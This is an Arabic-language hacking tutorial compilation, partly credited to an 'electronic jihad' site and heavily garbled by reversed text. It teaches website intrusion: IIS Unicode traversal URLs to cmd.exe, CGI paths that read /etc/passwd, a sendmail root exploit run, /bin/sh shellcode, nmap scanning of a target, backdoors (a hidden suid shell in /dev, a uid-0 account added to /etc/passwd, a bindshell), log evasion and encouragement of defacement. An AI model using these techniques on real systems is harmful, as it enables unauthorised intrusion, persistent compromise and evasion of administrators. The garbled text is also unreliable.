gcc -o Conik Conik.c ------< بدال الملف أسم تكتب انته انه الحظتغيرة المراد كونيك  أسمى

المثال سبيل على -: يعنى

gcc -o Conik conik.c

االمر هذه بعد جاهز الملف يكون وراح

./Conik.c

جاهز الملف ماصار  وبعد

$ gcc -o sendmail sendmail.c

$ ./sendemail 

Usage : sendmail >host< >OS< >user< >password<$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous

مكان >----- تبغاه الى الموقع هنا تكتب انته انك israel الحظconnecting to host...

connected...id

uid=0)root( gid=0)root(

للبرنامج الملقم ممنا طلب انه نظام Sendemail الحظ طلب وكمانوالباسورد واليوزر  التشغيل

أمتياز أعطانا البرنامج كله هذه البرنامج Root وبعد قيام بسببالـ Exan noferبتنفيذ

البرنامج حطيت انا لمن أنه تضن ال بدون XXX. SENDMAIL مالحظةالبرنامج هذه فى ثغره هناك آلنه المثال هذه لك حطيت أنا سبب  اى

هذه األسم تحفظ بدى بسكان تعالى الله شاء أن لك أشرحها وراح:-(

اللزوم عن زايدة الموضوع فى أتوغلنا نحنا انه  الظاهراتعلم:- 5س أبغا ما أنا بسبطلت ثغره علشان هذه كل الله يا  

في:- للثغرات شوية المعقده الطريقة هذه البى حبيب لووووول جـجدا جدا وسهله حلوة ثانية ثغرات

يا:- 6س ل قو أيشهي Conik نظام يبغالها الطريقة هذه ترىلغه وكمان Perl و C تشغيل

ملعومات تشوف انته يعنى المتصفح خالل من تستخدم تغرات فيهذه من الباسوردات ملف الى وتوصل المتصفح عبر الموقع

الطريقه

الثغرات هذه على PHP - CGI - UNICODE - VB - etc ومثال

اوووووة:- 7س UNICODE كيف اشوف نفسى كثير عنها سمعت أنا؟؟؟ ويشهى وأعرف شكلها

حبيبى:- نظام UNICODE جـ ضعففي عن عبارة في IIS هىMicrosoft عموما سهوله بكل الموقع أختراق في تساعد مما

جدا سهل الطرق بهذه  االختراق

أمثله أضع وسوف قبل من ذكرها تم التى السابقة بالطرق مقارنةثغرات -: UONICODE على

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%

35%63../winnt/system32/cmd.exe?/c+dir+c:\

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

أنواع فى أشكل انى المستطاع قد UONICODE حاولت

الـ ثغرات الى بالنسبة عليها CGI أما مثال  هذه

/cgi-bin/view-source?../../../../../../../etc/passwd

/cgi-bin/phf

/cgi-bin/wwwboard.pl

/cgi-bin/AT-admin.cgi

/cgi-bin/info2www

/cgi-bin/environ.cgi

هذه على األمر يقتصر ال يعنى الثغرات من العديد وباقى هذهالتشغيل نظام بحسب لك الثغرات أقسم وراح  الثغرات

NT : Uni code , bofferoverfollow , tftp 

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits, 

UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD, 

،،،انتهى

" المواقع اختراق لينكسفي " استغالل> اإللكتروني الجهاد موقع من >منقول

>Black_sNiper :الكاتب<

اختراق لينكسفي مع التعامل أراد مخصصلمن الموضوع هذافيه الكافية الخبرة وليسلديه  ...المواقع

بها القيام يستحسن التي العمليات عن الموضوع هذا يكون سوفالنظام على الدخول في والنجاح السر كلمة على الحصول  ..بعدباستخدام بعضاالنظمة على تدخل ان يمكن بأنه تعرف ان يجب أوال

أمر بتنفيذ لك تسمح بعضاالنظمة وتوجد المشهورة الكلمات بعضهي األوامر تلك وأفضل ذلك بعد النظام من باخراجك تقوم ثم واحد

:. 

who rwho finger 

المستخدمين تستعرضاسماء بأنك األوامر هذه من وتستفيدوذلك نفساالسم من السر كلمة تستخرج ان يمكن وبذلك للنظام

ألسمه تقريبا مشابهة سر كلمة يستعمل المستخدمين بعض ألن .: مثل

username : Black password : Black2 

بكتابة الدخول تستطيع بعضاألنظمة  demo أو test وفي

على دخولك بعد استخراجها عليك يجب والتي المهمة الملفات مننظام  .: أي

/etc/passwd 

/etc/group /etc/hosts 

/usr/adm/sulog /usr/adm/loginlog /usr/adm/errlog /usr/adm/culog 

/usr/mail /usr/lib/cron/crontabs 

/etc/shadow 

 .: bin الحسابمعظم به ويوجد المستخدم حساب على يحتوي حيث مهم وهو

فيمكن كذلك كان واذا السر كلمة ملف يوجد وقد المهمة  الملفات( )أحيانا( لك ) روت دخول وتضيفحساب بك خاصة سر كلمة اضافة

!! كالتالي بسهولة  .: والطريقةed passwd $ 

تقول مدير exec login وأخيرا انت تكون وبذلك اسم أي وتكتب !!النظام

واسم سر بكلمة نظام أي على دخولك عند تواجهه سوف الذي ما؟  !!مستخدم

االحتماالت هذه احدى ستقابل النظام الى دخولك  .: عند ) انك ) أو الروت النظام مدير حساب على الحصول استطعت انك اما

آخر مستخدم حساب على  ..حصلتالتالي االمر تكتب البداية  .: في

pwd $ تظهر  .: والنتيجة

usr/admin/ $ تستطيع وبذلك المدير على الدخول استطعت انك اظهرت النتيجة

قيود بدون النظام كامل مع  ..التعاملفمثال .. النتيجة تلك غير نتيجة ظهرت  : اذا

usr/Black/ $ المستخدم هذا حساب على دخلت انك على يدل  !!فهذااآلتي تكتب المستخدم هذا  .: ولعرضملفات

ls /usr/Black $ المستخدم هذا ملفات يعرضلك  .: وسوف

mail pers 

games bin 

يعرضملف لن هذا  profile. ولكناآلتي تكتب تستعرضه  .: ولكي

cd $ ls -a $ 

: : 

.profile $ 

التالي األمر تكتب ملففسوف محتويات قراءة اردت  .: اذاcat letter $ 

هو المطلوب الملف ان افترضنا اذا  letter وهذا

تكتب ان اال عليك فما السر كلمة تغيير اردت  .: اذاpasswd $ 

!! كلمة وتدخل معك طبعا وهي القديمة السر كلمة منك سيطلب ثمالجديدة  .. السر

التالي األمر تكتب معينة معلومة عن  .: للبحثgrep phone Black $ 

اآلخر بالمستخدم الخاصة الهاتف ارقام طلبت انك بافتراض  وهذا

اآلتي تكتب آخر ملف الى ملف من نسخ  .: ولعملcp letter letters $ 

األمر فتكتب اتصال على آخر مستخدم مع محادثة عمل اردت اذا .: التاليwrite $ 

اآلتي نكتب النظام على يوجد من  .: ولمعرفةwho $ 

safadM tty1 april 19 2:30 paul tty2 april 19 2:19 

gopher tty3 april 19 2:31 

ان يجب المظللة السر كلمات على المحتوي الملف قراءة اردت واذانفسه .. المدير حساب باستخدام النظام على دخلت قد تكون

نكتب السر كلمات  .: والستعراضملفcat /etc/passwd $ 

root:F943/sys34:0:1:0000:/: sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh 

checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh 

كالتالي للمدير آخر حساب يظهر  .: وقدBlack:chips11,43:34:3:Mr doooom:/usr/Black: 

ثالثة لمدة السر بكلمة االحتفاظ للمستخدم يمكن انه يعني وهذااسابيع ستة كل يغيرها ان يجب وانه تغيير بدون  .. اسابيع

كالتالي المجموعة  .: استعراضملف

ls /etc/group $ 

root::0:root adm::2:adm,root 

bluebox::70: 

اليحتوي أو سر كلمات على المجموعة ملف يحتوي ان  !! ويمكنمديرا انت تصبح ان يمكن فانه سر كلمة على اليحتوي كان اذا

وليسكمدير عادي لمستخدم سر بكلمة دخولك حالة في للنظامطرق بعدة وذلك .. للنظام

،،،انتهى

عن " المواقع اختراق احتراف في الياء إلى األلف من مفصل شرحلينكس " طريق

>منقول<> ايسر: > الكاتب

UNix Usage IN HackinGجميعا بكم  اهال

فعال .. الجميله الدروس من العديد هناك ان انوه ان احب البدايه فيليست و قديمه لكنها  up to date و

يمكن للمبتدئين مكانا يكون لكي هذاالدرسالمطول لكم اكتب لذلكمنه يستفيدوا  ان

اعجابكم على يحوز ان فعال اتمنى  و- الهامه المصطلحات : بعض

ال من كل على يطلقوا ان الناسيحبون من , pc , servers كثيرsupercomputers غيرها و

 BOX كلمهمن العديد على عاده يحتوي باختراقه نقوم سوف الذي النظام

لليوزرز .. باالضافه اليوزرزكلمه الرئيسهناك على تطلق ان هو ... root تسطيع و

, superuserيكونالنظام على المدير او االدمين هو ....و

التشغيل النظمه : بالنسبهالتشغيل .. نظام باستخدام تخترق ان يمكنك ال بل .. windows طبعا

اليونيكس التشغيل نظام من مشتق نظام اي الى .. تحتاجيصلح .. ... ال لماذا و بالذات االنظمه هذه لماذا هو السؤال حسنا

الويندوز؟؟: لسبيبن

1- لما ... نادر و اليونيكسسيستمز على شغاله اجهزه اغلبه االنترنتالويندوز على شغال جهاز  nt . 9x تالقي

على شغال سيرفير او جهاز تخترق حتى حاجه اقل اذنهذا .. التشغيل بنظام ملما تكون ان يجب ..اليونيكس

جهازك في تركبه انك االفضل من .. لذا2- في .. للعمل مصممه االكسبلويتات اكواد و اادوات معظم طبعا

اليونيكس .. بيئه

اللينكس؟؟ ... اليونيكس؟؟و توزيعات هي ما اوكيقسمين .. الي منقسم فهو لليونيكس : بالنسبهمجاني .) ( -1 غير يونيكستجاري

مجاني -2 و المصدر open source يونيكسمفتوح

جهازك على تركبه ان يمكن ال التجاري لليونيكس بالنسبهاالن .. تجاهله فيمكنك لذا  العادي

عائالت عده منه فيوجد المجاني  اما-BSD

اال .. لك االفضل من و االستعمال في االصعب و االقدم هي والجهاز على سيرفير تركيب في ترغب كنت اذا اال  تستعملها

...التعريف .. عن غني طبعا هو و اللينكس  يوجد

هي .. افضلها كان ان و التوزيعات من العديد منه يوجد ( SuSe طبعاالتوزيعه هذه في الناسيشكرون من الكثير اسمع لكن و اجربها لم

(فهي توزيه السهل بالنسبه الدروس MDK اما بعض هنا ضعت و قد و

بالمندريك  الخاصهقرائتها و تحميلها .. يمكنك

على مراسلتي اللينكسيمكنك على منه تحصل مكانا تجد لم انمكانا نحدد و ايميلي

الماندريك من نسخه هات 9لتسليمك الريد االسطوانات ) 7.2او ثمن فقط ( النسخ و البالنك

مجاني .. .. ... .. .. مستقر امن كثيره للينكسمميزات حال اي علىجهازك امكانيات ليالئم تطويره .. يمكنك

 االنترنت -ام ... .. .. .. جهازك تخترق ان تريد جميل جميل تخترق ان تريد ماذا

؟؟ ماذاعلى.. ... .. نبحر دعنا اذن االنترنت في مبحره اجهزه تخترق ان تريد اه

 االنترنت

كان .. هذا لكن االنترنت من الدرسده على حصلت انك عارف اناالويندوز طريق عن

.. .. ... فلسفه ذه لينكسي انسان انت مختلف انسان اليوم انت لكن.. محترمه

اساسا .. لن اليونيكس نظام من االنترنت الى تبحر ان يجب اذناللينكس على بتاعك المودم تعرف ان يجب

ان .. .. حتالقي المودم تعرف حاول عندك اللي التوزيعه حسب؟؟ بالجهاز موصل مودم اي يجد اللينكسلم

تتعجب .. ال هذا .. ماالداخليه المودمات عليها internal فكل .. winmodems يطلقون

التشغيل نظام تحت للعمل اساسا مصممه النها .. windows لماذااللينكس تلوم ال .. ارجوك

هذه الداخليه الفاكس كروت صانع تلوم ان يجب  بلالخارجي .. للمودم بالنسبه اما حقيقي external اوكي مودم real فهو

or true modems مثل ... الخارجيه المودمز من العديد  acorp , u.s. robotics يوجد

يكون المودم ان تتاكد ان ليس serial يجب  USB وموضوعنا في خلينا حال اي ...على

ال .. خالل من االنترنت على ادخل نظام isp خالص خالل من وذلك الليونيكس

االيقاع يتم اال تحاول ان هي االختراق في الشروع قبل حاجه اهممعين سيريفير الختراق محاولتك كشف و .. بك

العديد هناك الن اليها اتطرق لن لذلك عديده سائل و هنك طبعا واالثر وازاله الحمايه مجال في المتميزه الشروح  من

ثالثه او نقطتين في : الخصهم1- حتى .. ال و اختراقه تحاول موقع في تسجل ان تحاول ان ايكالخاصبك بي االي لكشف عرضه يجعلك قد هذا الن مزوره باسامي

ال ثم من ت ... isp و الفل صباح و هاتفك رقم  ثمالهاك -2 بامور المهتمين غير اما ابدا باختراقاتك تتباهى ان ... اياك

3- فهمتني ... .. انت ال ال جهازك خالل من دائم تخترق اال احاولكافيه .. لنت تروح يعني مشقصدي  غلط

لكن =====< ... .. مشمامون ده الضحيه الجهاز جهازك ... >====== كده======< ده الضحيه السيرفير وسيط جهاز جهازك

 كويساوي .. من مخترق جهاز مثال يكون ممكن ده ده الوسيط الجهاز ايه طيب

اكاونت شيل او . قبل : من يمكنك حيث خدمه عن عباره هو اكاونت الشيل ماهو طيب

اليونيكس نظام عليه الجهاز هذا و بعيد من جهاز في التحكم  خاللهاممن .. العديد يوجد و الجهاز هذا باختراق تقوم ان غير من طبعا

مجانا الحدمه هذا .. يقدمونمثل -4 مهمه و خطيره اجهزه تخترق ال ان او gov .mil. حاول

ان قبل عليك اجب النمط edu. سيرفيرات هذا من غيرها .واخفاء .. -5 لعمل الفريكينج بعضتقنيات على تعتمد النقطه هذه

لديك الخدمه مزود عن تليفونك REdirecting. لرقم

- ال ومنافذ المواقع : TCP فحص

االنترنت .. يمشي كيف تعرف ان باالختراق تقوم ان قبل عليك يجبيدعى بروتوكول على يعتمد  TCP\IP انه

االخرى البروتوكوالت بعض .... وابوسايدك ... معايا ركز D= طيب

هذا .. مفتوحه بورتات فيه بيكون النت على جهاز كل المفروضانالداتا بارسال خاللها من تقوم ان يمكنك البورتات

فقط .. ) المفتوحه المفتوحه البورتات هذه الجهاز ذلك الى جهاز منبوكس( ريموت من الداتا لتلقي دائما استعدد على تكون

بخدمه يسمى بما المفتوحه البورتات ترتبط ما >> service.. دائماالخدمه هذا ديمون service و خالل من مستضافه daemon or تكون

server فانه .. السيرفير في بفتحه الموقع صاحب قام اذا هذا الديمون اذن

خالله .. من هذا الديمون يقوم لكي السيرفير في منفذ بفتح يقومالملعونه الخدمه D= بتقديم

هناك .. طبعا لكن بهم الخاصه البورتات مع الخدمات بعض هذه وكثيير

21 FTP FTPd23 Telnet telnetd

25 SMTP sendmail )yes!(80 HTTP apache110 POP3 qpop

كلمه d حرف اخر لكلمه ftp , telnet ..etc في  daemon اختصار

المتصفح : خالل من العنوان هذا بزياره قمت سيادتك لو مثال www.host.netمثال ؟؟ يحدث ماالذي

ال بورت خالل من بالموقع باالتصال المتصفح 80رقم TCP يقوم  االمر بارسال يقوم ثم

GET /HTTP/1.1 /index.html كثيره اخرى .. واوامرالخاص الهتمل كود بارسال المطلوب الموقع يقوم ذالك بعد ثم

index.html بالصفحه

ال ان الطريف الخطيره daemons الشيء االمنيه بالثغرات مليئه ديمحتاجينه... احنا اللي ده هوه و =<

ال اي تعرف ان يجب موقع باختراق تقوم لكي daemons اذنتعرف ان عليك يجب لذلك السيرفير عل  الموجوده

كيف ... اذن المستهدف السيرفير في المفتوحه المنافذ ماهيهذه المعلومات عى .. تحصل

ال ما خالل تحول ... port scanersمن برامج عن عباره هي السكانرزذلك .. و المنافذ جميع خالل المستهدفمن بالسيرفير تتصل ان

المفتوحه البورتات اي  لمعرفهاالداه ... هي السكانرز هذا اشهر السيرفير هذا بواسطه nmap في

fyodor !!.. ايه و بالويندوز خاصه منها نسخه يوجد الحظ لحسن و؟؟ .. ده

خالص ده الويندوز ننسى مشاتفقنا <= احناhttp://members.lycos.co.uk/linuxdude/e3sar/

نسخه.. على نحصل ان للينكسيمكننا بالنسبه هيئه nmap طيب علىrpm 

التالي اتبع لتركيبها : وbash-2.03$ rpm -i nmap-2.53-1.i386.rpm

الدرس .. مدار على سنحاول الله شاء ان و بالتشغيل نقوم ثمالموقع مستهدف target.edu باستخدم لموقع .. كمثال

التالي : اتبعbash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ) www.insecure.org/nmap/ (

Interesting ports on target.edu )xx.xx.xx.xx(:)The 1518 ports scanned but not shown below are in state:

closed(Port State Service

21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http

110/tcp open pop3

Nmap run completed -- 1 IP address )1 host up( scanned in 34 seconds

ال قام لقد قام nmap اذن و الموقع على فحصشامل بعملترى كم المفتوحه المنافذ !!بمعرفه

ال و الخدمات اي ايضا نعرف ان يمكننا في daemonsاذن الموجوده target.edu الموقع

فكر .. المنافذ هذا احد من بالموقع لالتصال معينه اداه يلزمنا لكناالداه؟؟؟ هذه ماهي معي

التلنت .. .. .. خالل من خدمه هوه التلنت ان صحيح اه التلنت انها نعمعن .. عباره ايضا لكنه و  ديمون

من .. معين بمنفذ موقع باي االتصال خالله من يمكنك بسيط برنامجال ... TCP خالل مثال نشوف : تعال

bash-2.03$ telnet target.edu 21Trying xx.xx.xx.xx...

Connected to target.edu.Escape character is '^]'.

220 target.edu FTP server )SunOS 5.6( ready.quit

221 Goodbye.Connection closed by foreign host

اهااااااوي اوي قيمه معلومات على دلونا  دول

هو -1 هناك التشغيل SunOS 5.6 نظامال -2 هو هناك بي تي االف نظم standardديمون مع بييجي اللي

sunOS السن

التلنت من بيه نتصل تاني بورت نجرب : تعال

bash-2.03$ telnet target.edu 25Trying xx.xx.xx.xx...

Connected to target.edu.Escape character is '^]'.

220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 )EDT(

quit221 2.0.0 target.edu closing connection

Connection closed by foreign host.

ديمون ان هي قيمه معلومات استفدنا ال smtp ايضا و sendmail هوهو ه اصدار 8.11.0/8.9.3ان

الن .. ؟؟ المعلومات هذا الى نحتج لماذا طيب حميل جميلعلى تعتمد دائما الموجوده الثغره و  االكسبلويت

وهي .. daemon ال مشكله توجد لكن التشغيل نظام على و الموجودصحيحه غير او مزوره تكون ان يمكن قد المكعلومات بعض ان

كده معايا ؟؟؟تابع : ازاي nmap باالداه

bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ) www.insecure.org/nmap/ (

Interesting ports on target.edu )xx.xx.xx.xx(:)The 1518 ports scanned but not shown below are in state:

closed(Port State Service

21/tcp open ftp23/tcp open telnet25/tcp open smtp80/tcp open http

110/tcp open pop3

TCP Sequence Prediction: Class=random positive incrementsDifficulty=937544 )Good luck!(

Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address )1 host up( scanned in 34 seconds

اسود |: يانهارلينكس هو بتخمينه قامت االده اللي التشغيل !!!!!! نظام

الكلب !!!!!! sunOS مشكان الد و يا @= اه

نقول .. نقدر لكن اللينكسالوجوده توزيعه نعرف الزم برده بساحناتمشي ممكن و كفايه جمعناها اللي المعلومات  ان

احد .. ممكن لكن و الموقع على سكان بعمل قمن احنا كده طيبحيكون ... نه اعتقد بفحصموقعه قمنا اننا ان عرف لو االدمينز

لذلك مننا يزعل االدمين مشعايزين حنا و منن زعالناالختيار يعتبر Ss- استخدمنا لموقع سكان عمل فان حل اي على

فيه مشاكل ال شرعي D= عملراجع المعلومات من :لمزيد

bash-2.03$ man nmap

اكونت شل على ادواتك .. رفع) من تخترق مشعايز و اكاونت شيل عندك كن اذا الخطوه هذه

) جهازكالتالي : اتبع

bash-2.03$ lsprogram.c

sh-2.03$ ftp shell.comConnected to shell.com

220 shell.com FTP server )SunOS 5.6( ready.Name: luser

331 Password required for luser.Password:

230 User luser logged in.ftp< put program.c

200 PORT command successful.150 ASCII data connection for program.c )204.42.253.18,57982(.

226 Transfer complete.ftp< quit

221 Goodbye

ا خالل ن الطريقه هذه ftpطبعاان لك يفضل لذلك اللوج ملفات بعمل تقوم النها محببه غير هي و

الشيل ملففي في لصقها و االكسبلويت سورسكود بنسح . تقومsh-2.03$ vi exploit.c

الكود الصق و بالشيل اتصل و تاني تيرمينال افتح ثم الكود انسخ ثمبامتداد سميه و ملف c.في

اكاونت للشيل بتاعتك االكسبلويت رفعت انت . كدهالهوست على رن اعملها بعدين و لالكسبلويت وكومبايل

 المستهدفsh-2.03$ gcc program.c -o program

sh-2.03$ ./program

.. كل : بيها مسلم كقاعده دول االمرين تاخد انك اوي عيب ملحوظهفي طريقه له و الكومبايل في الخاصه اوامره له و اكسبلود

 التشغيلال في او البرمجي التعليق في الطريقه هذا . usageتظهر

المختلفه - الثغرات -: استغاللالتشغيل . نظام ماهو تعرف ان بمجرد الموضوع في جزا اهم هذا

السيرفير على الشغاله الديمونز ايضا و المستهدف الموقع عنددي .. و اكسبلويت بتقدم اللي بيز دتا اي الى تذهب ان فيمكنك

االنترنت على بكثره  موجودهhttp://www.linux.com.cn/hack.co.za

نظم .. و ديمونات الى مقسمه تتخيله ممكن حاجه كل فيه ده مثال تشغيل

؟؟ .. االكسبلويت ماهي لكن واو السي فبلغه مكتوب عاده سورسكود عن عباره االكسبلويت

ان المهم  البيرلفي .. السيرفير في معينه منطقه باستغالل تقوم دي االكسبلويت

TARGET.EDU حالهب الخاصه االكسبلويت نستخدم ان اي sendmail 8.11.0 يمكننا او

اخر ديموناكبر هو ميل السند ان يقولوا اسمعهم ديما العيال فكره على

؟؟ .. اساسا ميل السند ايه مشعارف معرضلالختراق ديمونتعرف نت و للدرسده رووح : طيب

http://www.pharaonics.net/less/NEtworks/124.htmسيرفير . على اكسبلويت تشغل لما ان تعرفها الزم حاجه فيه

الموقع .. ) ( اختراق طبعا غير عليك جتعود اللي الفوائد ايه معينعادي .. شيل حاجه اول اتنين حاجتين على .... حتحصل

شيل بالرووت مايسمى لنا بالنسبه المهم ده و حاجه .. تانيتمتلك كده فانت اذن السيرفير على شيل رووت اخدت لو انت طبعا

تستعمل .. ممكن عايزه انت اللي كل تعمل ممكن و الصالحيات كفهالدرس اول في قلت ما زي سيط و كجهاز ده شيل  الرووت

لالكسبلويتاتهي صغيره بيز www.securityfocus.com : دتاwww.insecure.org/sploits.html

.. يجب و االخرى عن مختلفه اكسبلويت كل ان قلت ما زي طيبلغه في تفهم ال كنت اذا التعليقات او بتاعها الكود تقرا ان عليك

.. البرمجههذه ... يقوم فلو اوفر البفر هي االكسبلويتات اشهر و اسهل من

الديمون ) ( في دربكه بعمل  االكسبلويتتريده الذي الكود تشغيل الى يؤدي  مم

شيل يسمى فهو لذلك السيرفير في شيل بتشغيل الكود هذا يقوم shell codeكود

ان .. علينا يجب لذلك التشغيل لنظام تبعا الكود هذا يختلف طبعاالسيرفير في المستخدم التشغيل نظم نعرف

ده نالقي ممكن معينه اكسبلويت كود شوفنا  لوchar shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\ x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\ x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

دهه.. المسار في اللي الشيل بتشغيل يقوم للينكسو دهه اها/bin/sh

يجب اذن اخر تشغيل نظام على شغال بتاعك السيرفير لو طبعاكود الشيل تغير ان  عليك

تالقيشيل .. ممكن طبعا المستهدف النظام يناسب اخر الى دهالمختلفه السيكيورتي مواقع في التشغيل نظم .كودسلجميع

...و .. االختراق في متستعملشجهازك انك البا عليك يجب قلت ما زي

الى .. لدخول طريقه اكاونت شيل او وسيطا جهازا تستخدم انماكالتالي اكاونت الشيل

bash-2.03$ telnet myshellaccount 23Trying xx.xx.xx.xx...

Connected to yourshellaccount.Escape character is '^]'.

Welcome to yourshellaccountlogin: malicioususer

Password: )it doesn't display(Last login: Fry Sep 15 11:45:34 from >yourIPaddress<.

sh-2.03

اسمها ميل للسند اكسبلويت عندنا لو exploit.c طيبتشغيله .. و الكومبايل عمل اوال يمكننا فلو اوفر بفر تعمل هي و

:كتالليsh-2.03$ gcc exploit.c -o exploit

sh-2.03$ ./exploitThis is a sendmail 8.9.11 exploit

usage: ./exploit target portsh-2.03$./exploit 25 target.edu

هناك ...$ شيل اخدنا اننا معنها جميل جميلالسيرفير على ايه وضعنا نشوف : تعال

$whoamiroot

رووت .. بقيت انا كده عيني )= ياعلى رووت مشبتخليك االكسبلويتت من العديد فيه طيب

هنال.. بسشيل تديك انما و السيستملوكل اخر اكسبلةيت برفع تقوم ن عليك يجب  local لذلك

... رفع تتجنب ان تحاول ن تذكر النظام في الرروت على للحصول)= ( عايزينك احنا المستطاع قدر على بي تي باالف )االكسبلويتات

.. تي اي الباسورد ملف اظهار صالحيه تعطيك اخرى اكسبلويتات فيه>= سي

- دور باك -: وضعانت .. .. ؟؟؟فعال بعد ماذا السيستم على رووت اخذنا فقد اذن جميل

الرئيسيه الصفحه او الموقع بتغير تقوم ان امكانك فياالمر باستخدام او مكان اي االندكسفي عن تبحث ان عليك ما كل

.. فايندانك .. اوي عيب الن الالمرز شغل ده زعل غير من و بصراحه هذا لكن

موقع على عضالتك هذه edu. تفرد اختراق بامكانهم الهاكرز فاغلبالدومينات

مثل محترم موقع في الرئيسيه الصفحه بتغيير جديا انصحك لكن  وmicrosoft.com , ibm.com etc 

اي ... على الدين تسب التي او كاالباحيه المحتوى السيئه المواقع اودهه مشموضوعنا حل

اجهزه .. الثالث تذكر دهه بالموقع نحتفظ عايزين دلوقتي احنا طيب اياهم

>------ المستهدف-----< الجهاز وسيط جهاز . جهازكدلوقتي؟؟ ايه حنعمل اذن

كتبت .. لو انت حاجه للشيل exit في تعود و ده السيرفير بره حتطلعنفسالخطوات يلزمك تاني ترجع عشان و  بتاعك

بتغيير قام قد االدمين يكون ان يحتمل قد الفتره هذه في وله جريد اب بعمل قام او المصاب باتشللديمون ركب او الباسورد

؟؟ .. الحل و عملها في االكسبلويت تفشل ان يؤدي ممانركب ... اذن نفسنا في اللي نعمل ممكن و رووت دلوقتي بساحنا

وقت اي في ذلك بعد بالعوده لنا يسمح دوور .. باكو .. يكشفه النورتون ان صعب اتاك الهاك هوه دور باك احسن

اه... |= |= ممك؟؟؟؟ ايسر يا ياد ده الكالم ايه

اتاك !!!!!! |= هاكنسيت )= ... اسف

الفاضي الكالم عن تماما تختلف ده موضوعي في دورز الباك طبعامؤاخذه ال و  ده

لكم احطه شاء ان لواحده موضوع عايزالها دي دورز الباك طبعافقط .. االساسيات لكم ساذكر انا لكن .. قريبا

تعمل -1 ؟؟؟؟sushi ازايبعمل تقوم ال suid shell او sushi لكي بنسخ تقوم ان يلزمك

/bin/shال صالحيات باعطاءه نقوم و خفي مكان : كالتالي suid الى

sh-2.03$ cp /bin/sh /dev/nulهههههه

الدايركتوري داخل ينظر ال االدمين االحيان اغلب لو .. dev في واساسا ملف فيه الن غريب بشيء يشعر لن فانه دخله نظر و حصل

null اسمه=D اوي جدعان عيال احنا ده D= ال

sh-2.03$ cd /devsh-2.03$ chown root nul

عايزينها احنا اللي الصالحيات الشيل -: نعطيsh-2.03$ chmod 4775 nul

ال 4775 عايزينها suid معناها احنا . اللياالمر ان بالك بعض chmod +s nul خلي ميشتغلشفي ممكن

كله .. في بيعمل االول االمر مع خليك .. االنظمه

نشوف .. و كده بره نطلع تعالى مهمتنا خلصنا  كدهsh-2.03$ exit

رجعنا 80بعد لو يوم =D حيحصل اللي كده نشوف : تعالsh-2.03$ whoami

lusersh-2.03$ /dev/nulsh-2.03$ whoami

root

سهوله بكل االن يوزرز سوبر )= احناال .. صالحيات اعطاء تمنع الشيلز من كثير في مشكله suid فيه

ال على مينفعشنحصل  sushi يعنيخاص شيل المخترق للسيرفير نرفع ان يلزمنا الحاله هذه في و

اسمه ل sash تاني اختصار هو  A stand-alone shell وبه خاصه اوامر ... ذو

ال صالحيات باعطاء يسمح هو االن bin/sh/ ل suidو نعمل نقدر اذنsushi ال

؟؟ -2 مزورين يوزرز نضيف كيفالملف في تغيير تعمل تقدر و رووت انت ممكن etc/passwd/ طبعا و

عايزه انت حد اي تضيف انك ده الملف خالل  منالمحرر -: vi باستعمال

sh-2.03$ vi /etc/passwdالمحرر استخدام كيفيه عن فكره عندك يكون الزم  vi طبعا

ده الشكل على يكون عادي يوزر لكل حتالقيسطر ده الملف  فيluser:passwd:uid:gid:startdir:shell

ال بيكون يوزرز السوبر حاله uid & gid =0 فيده السطر اضف : اذن

dood::0:0 ood:/:/bin/sh للنظام يوزر سوبر اانتضفت كده و

sh-2.03$ su doodsh-2.03$ whoami

dood

االخ .. الن ليه رووت احنا ال dood طبعا من ال gid كل يساوي uid وصفر

تضع -3 ؟ bindshell كيفbindshell بال جد شبيه ديمون عن التلنت telnetd عباره الحقيقه في

شيل بايند عن عباره .. ديمون

ليسمنفذ لكنه و يعني منفذ او بورت بفتح يقوم هذا شيل البايندTCP منفذ UDP بل

البورت بهذا االتصال عند شيل بيعطيك طبعا .. وسكان يعمل ييجي لما االدمين انه الموضوع في الشيق و الطريفيكون السكن االحيان اغلب في و عاده للتامين بتاعه الجهاز علىال منافذ منافذ TCP على على سكان يعمل ان جدا نادرا و

UDP بروتوكول

االثار - ازاله -: عمليهترى .. .. فنكا حسابك الى بالدخول تقوم عندما اليونيكس نظاام فيرقم و بالدخول بها قمت مره باخر تعلمك الدخول اول عند رساله

منه دخلت الذي بي .. االيحيالقي دخل ده اليوزر كده بعد و يوزر باسم دخلت لو سيادتك يعني

دي  الرساله

Last login: Sun Sep 24 10:32:14 from >yourIPaddress<.حتتكشف كده سيادتك طبعا  و

يبلغه و يقوله و لالدمين ايميل حيبعت ناصح كان لو ده اليوزر النحصل باللي

يقوله و رساله حيبعتله الحال في االدمين طبع -: وبتاعه بي االي و بتاعك الحساب على دخل واحد ده واد يا متخافش

الله .. شاء ان ن و موجوودان و التلفون رقم عن اساله و المنطقه في الخدمه بمزود حاتصل

البوليس ابلغ .. شاءالشفا و بالهنا )= و

دي المناطق في موجوده دي  المعلومات

